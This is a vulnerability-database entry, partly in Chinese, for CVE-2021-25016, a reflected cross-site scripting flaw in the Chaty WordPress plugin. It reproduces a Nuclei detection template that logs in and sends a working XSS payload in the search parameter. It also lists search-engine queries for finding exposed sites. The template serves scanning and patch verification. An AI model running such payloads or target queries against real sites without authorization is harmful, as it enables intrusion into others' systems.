CVE-2021-25016: Chaty < 2.8.2 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Chaty | POC: 已公开

漏洞描述

The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.

PoC代码[已公开]

id: CVE-2021-25016

info:
  name: Chaty < 2.8.2 - Cross-Site Scripting
  author: luisfelipe146
  severity: medium
  description: |
    The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
  remediation: Fixed in 2.8.3
  reference:
    - https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25016
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25016
    cwe-id: CWE-79
    epss-score: 0.10375
    epss-percentile: 0.92929
    cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: premio
    product: chaty
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/chaty/
    fofa-query: body=/wp-content/plugins/chaty/
    publicwww-query: "/wp-content/plugins/chaty/"
  tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "search=</script><img src onerror=alert(document.domain)>"
          - "chaty_page_chaty"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e55a4b5e398833ac34880a744e4ce8f551cbd79ef8bbe32ce922047fb5cd594502205a28f097b66830f8854ef8e9c9b25968f04d4de34c8d1247a7aeca813b14efc5:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-25016.yaml